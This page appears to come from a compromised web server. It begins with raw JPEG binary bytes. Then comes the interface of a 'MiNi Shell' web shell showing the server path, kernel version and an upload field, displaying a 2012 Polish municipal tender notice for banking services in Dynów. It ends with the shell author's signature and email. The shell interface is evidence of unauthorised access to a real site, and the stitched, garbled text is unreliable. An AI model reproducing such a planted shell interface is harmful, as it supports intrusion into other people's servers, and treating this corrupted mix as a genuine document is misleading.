JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120402/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120402/75359-N-2012.html

<p class="kh_header"><b>Dynów: Kompleksowa obsługa bankowa budżetu Gminy  Miejskiej Dynów.</b><br>
<b>Numer ogłoszenia: 75359 - 2012; data zamieszczenia: 02.04.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Dynów , Rynek 2, 36-065 Dynów, woj. podkarpackie, tel. 016 6521093 w. 49, faks 016 6521093.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.dynow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Kompleksowa obsługa bankowa budżetu Gminy  Miejskiej Dynów..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Kompleksowa obsługa bankowa budżetu Gminy Miejskiej 	Dynów obejmować będzie:
                          1) Otwarcie i prowadzenie:
                    a) rachunków: bieżącego Gminy Miejskiej Dynów i rachunków pomocniczych Urzędu
                         Miejskiego w Dynowie;
                    b) rachunków bieżących i pomocniczych gminnych jednostek organizacyjnych:
                      -  Miejskiego Ośrodka Pomocy Społecznej w Dynowie,
                      -  Zakładu Gospodarki Komunalnej w Dynowie,
                      -  Miejskiego Ośrodka Kultury w Dynowie,
                      -  Miejskiej Biblioteki Publicznej w Dynowie,
                      - Środowiskowego Domu Samopomocy w Dynowie,
                      - Szkoły Podstawowej Nr 2 w Dynowie,
                      - Przedszkola Miejskiego w Dynowie,
                      - Zespołu Szkół w Dynowie,
 Wykonawca musi zagwarantować te same warunki prowadzenia rachunków dla wszystkich
 jednostek organizacyjnych Zamawiającego.
Uwaga: Zamawiający zastrzega sobie prawo otwarcia rachunków bankowych dla gminnych jednostek organizacyjnych, które mogą powstać w okresie obowiązywania umowy, na warunkach określonych w ofercie wybranej w niniejszym postępowaniu.
2) Realizacje poleceń przelewów w dniu złożenia zlecenia płatniczego.
     Zlecenia płatnicze mogą być składane w dni robocze w godzinach od 8.00 do 15.00.Bank   ponosi odpowiedzialność za szkody powstałe z jego winy wskutek nieterminowej lub nieprawidłowej realizacji zlecenia płatniczego Zamawiającego. Możliwość prowadzenia operacji bankowych w ostatnim dniu roboczym roku kalendarzowego do godz 12.00.
3)Prowadzenia punktu obsługi kasowej (agencji) na terenie miejscowości Dynów, zapewniającej pełną obsługę bankową w zakresie operacji gotówkowych i bezgotówkowych. Punkt musi być czynny w godzinach 8.00 do 15.00 we wszystkie dni  robocze. Koszt uruchomienia,wyposażenia oraz prowadzenia punktu,ponosi Wykonawca. 
4) Przyjmowanie wpłat gotówkowych.
5) Dokonywanie wypłat gotówkowych.
Uwaga: Wykonawca musi zagwarantować, iż rachunki Zamawiającego będą obciążane/uznawane dokładnie w dniach,kiedy Wykonawca będzie obciążany/uznawany w wyniku rozliczeń międzybankowych oraz wpłat/wypłat realizowanych bezpośrednio u Wykonawcy.
6) Potwierdzenie stanu salda za każdy dzień roboczy najpóźniej do godz. 12.00 następnego dnia roboczego.
7) Telefoniczne informowanie o stanie konta bankowego.
8)Dostarczanie wyciągów w formie papierowej oraz na żądanie w formie pliku
    elektronicznego.
Uwaga: Zamawiający zastrzega sobie obowiązek dołączenia do wyciągu bankowego dokumentów źródłowych,bądź innych dokumentów potwierdzających operacje przeprowadzone na rachunkach bankowych bez ponoszenia dodatkowych opłat.
9) Wydawanie blankietów czekowych,
10) Wydawanie opinii bankowych na pisemne zlecenie Zamawiającego,
 11) Udzielanie kredytu w rachunku bieżącym do 7 dni od złożenia wniosku do kwoty 
   1 500 000,00 zł w każdym roku kalendarzowym ( nie dotyczy gminnych jednostek organizacyjnych).
Kredyt w rachunku bieżącym będzie zabezpieczony wekslem własnym in blanco.
Kredyt  w następnych latach objętych umową może ulec zmianie w przypadku, gdy uchwała na dany rok budżetowy określać będzie inny limit zaciągniętego kredytu. Kredyt będzie ewidencjonowany w rachunku bieżącym budżetu gminy. Zamawiający może dysponować środkami do wysokości przyznanego limitu zadłużenia,natomiast każdy wpływ środków na rachunek bankowy będzie powodował zmniejszenie salda zadłużenia. Oprocentowanie kredytu oparte będzie np. na zmiennej stawce WIBOR 1M.
Zamawiający nie dopuszcza możliwości pobierania opłat i prowizji bankowych od zaangażowania kredytu tj. od salda niewykorzystanej części kredytu.
          12) Udostępnienie elektronicznego systemu typu home banking
      Usługa typu home banking w szczególności powinna obejmować:
a) zainstalowanie, na pisemne zlecenie Zamawiającego stanowisk do obsługi systemu ( czas       instalacji jednego stanowiska- do 7 dni od przyjęcia zalecenia),
  b) kompleksowe przeszkolenie ( w siedzibie zamawiającego oraz jednostek organizacyjnych) w zakresie obsługi systemu wskazanych przez Zamawiającego osób,
c) bieżące doradztwo i pomoc techniczną z zakresu obsługi systemu,
d) bieżące doradztwo i pomoc techniczną z zakresu obsługi systemu( pomoc techniczna w godzinach od  7.00 do 15.00), a  w przypadku wystąpienia awarii systemu wymagane jest bezzwłoczne podjęcie działań w celu jej usunięcia,
oraz umożliwiać na każdym zainstalowanym stanowisku:
a)wprowadzenie,aktualizowanie,przeglądanie,drukowanie i archiwizowanie zleceń
   płatniczych,
b)uzyskanie informacji o aktualnym stanie rachunków bankowych Zamawiającego ( wysokość
    salda,dokonywane operacje).
Wykonawca ponosi pełną odpowiedzialność finansową za wszystkie szkody wynikłe 
z nienależytego zabezpieczenia systemu przed działaniem osób nieupoważnionych.
      13) Bezpłatne doradztwo bankowe.
14)Automatyczne przekazywanie środków z rachunków bankowych wskazanych przez Zamawiającego na rachunek podstawowy  Gminy Miejskiej Dynów w ostatnim dniu roku kalendarzowego.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 66.10.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 59.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1) Wykonawca musi złożyć oświadczenie  o spełnieniu warunku udziału w postępowaniu, zgodnie ze wzorem jako załącznik  Nr 2 do SIWZ.
2) Wykonawca musi przedstawić zezwolenie na utworzenie i rozpoczęcie przez bank działalności wynikającej z ustawy z dnia 29.08.1997 r. - Prawo bankowe ( Dz. U. z 2002 r Nr 72, poz.665 z późn. zm) - (dotyczy banków utworzonych po 1 stycznia 1998 r.) lub inny dokument uprawniający do wykonywania czynności bankowych.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1) Wykonawca musi złożyć oświadczenie o spełnieniu warunku udziału w postępowaniu, zgodnie z
                    wzorem jako załącznik Nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1) Wykonawca musi złożyć oświadczenie o spełnieniu warunku udziału w postępowaniu, zgodnie z
                    wzorem jako załącznik Nr 2 do SIWZ;
                2) Wykonawca musi posiadać oddział banku, punkt obsługi kasowej ( agencję) na terenie miejscowości Dynów zapewniający pełną obsługę bankową w zakresie operacji gotówkowych i bezgotówkowych ( w przypadku braku takiego punktu Zamawiający żąda zapewnienia Wykonawcy o utworzeniu ww. punktu po wygraniu przetargu. Wykonawca przedkłada informację jako załącznik Nr 4 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1) Wykonawca musi złożyć oświadczenie o spełnieniu warunku udziału w postępowaniu, zgodnie z
       wzorem jako załącznik Nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1) Wykonawca musi złożyć oświadczenie o spełnieniu warunku udziału w postępowaniu, zgodnie z  wzorem jako załącznik Nr 2 do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1) Zmiany danych osobowych oraz rachunku bankowego,
         2) Zmiany termu realizacji  przedmiotu umowy i wypłat transz kredytów:
            a) uruchomienie kredytu w rachunku bieżącym może nastąpić w ratach lub jednorazowo w pełnej
           wysokości, w każdym roku kalendarzowym w okresie trwania umowy,maksymalna wysokość kredytu w danym roku kalendarzowym zależeć będzie od podjętej uchwały budżetowej na poszczególne lata,
3) Zmiana stawki oprocentowania kredytu:
   a) do umowy kredytowej przyjmując się,że stawka WIBOR 1M będzie mieć wartość z dnia podpisania umowy i będzie ulegać zmianie co jeden miesiąc, począwszy od dnia podpisania umowy ( w przypadku gdy zmiana stawki wypadnie w sobotę,niedzielę lub święto- przyjmuje się stawkę WIBOR 1M z dnia poprzedzającego, w którym jest, w którym jest ustalona).Zmieniona stawka bazowa będzie przez kolejny miesiąc równa stawce z dnia zmiany oprocentowania. Do ustalonej stawki WIBOR 1M doliczana będzie wartość stałej marży zaoferowanej przez Wykonawcę,która nie będzie ulegać zmianie przez cały okres obowiązywania umowy;
   b) Zamawiający dopuszcza obsługę kredytu liczoną na podstawie innych stawek, wskaźników zaproponowanych przez Wykonawcę,po warunkiem że zmiana warunków odbędzie się z korzyścią dla Zamawiającego ( obniży się koszt obsługi kredytu).</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.dynow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski  w Dynowie ; 36-065 Dynów, ul. Rynek 2, pok. 4..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.04.2012 godzina 08:30, miejsce: Urząd Miejski w Dynowie; 36-065 Dynów, ul. Rynek 2, sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com